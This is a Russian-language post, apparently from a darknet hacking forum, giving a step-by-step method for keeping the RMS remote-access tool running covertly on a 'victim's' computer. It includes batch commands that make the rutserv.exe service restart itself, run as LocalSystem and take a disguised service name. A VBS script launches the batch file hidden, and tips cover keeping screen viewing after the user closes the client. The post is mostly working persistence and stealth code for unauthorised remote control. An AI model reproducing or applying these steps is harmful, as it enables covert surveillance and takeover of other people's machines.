Процесс RMS (bat) + изменение название службы

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

teranser

VIP

teranser

VIP
6 Янв 2017
476
257
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Данная идея осуществляется исключительно на компьютере "жертвы". Нашей целью будет создание не убиваемого процесса "rutserv.exe".

1.Для того что бы сделать не убиваемый процесс "rutserv.exe" и изменить название службы нужно создать батник с этим кодом
Код:
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
sc config RManService obj= LocalSystem type= interact type= own
sc config RManService DisplayName= "НАЗВАНИЕ СЛУЖБЫ, КОТОРОЕ ВЫ ХОТИТЕ ПРИСВОИТЬ (С КАВЫЧКАМИ ,можно по фану выбрать службу из системных виндовс-а,ток н знаю будут ли конфликты с службами)"
2.Для скрытого запуска нам надо использовать vbs (БАЙСИК!)
Код:
Dim oShell
Set oShell = WScript.CreateObject ("WSCript.shell")
oShell.run "НАЗВАНИЕ БАТНИКА", 0
Set oShell = Nothing
3. Чтобы сделать процесс "убиваемым", создайте батник с кодом:
Код:
sc failure RManService reset= 0 actions= no/1000
PS
Если юзер закроет rfusclient.exe, то вы не сможете видеть его экран, для запуска этого процесса (точнее процессов), закройте через диспетчер задач на удаленном пк процесс "rutserv.exe", после этого перезапустятся процессы: "rfusclient.exe" (от юзера и системы) и "rutserv.exe" соответственно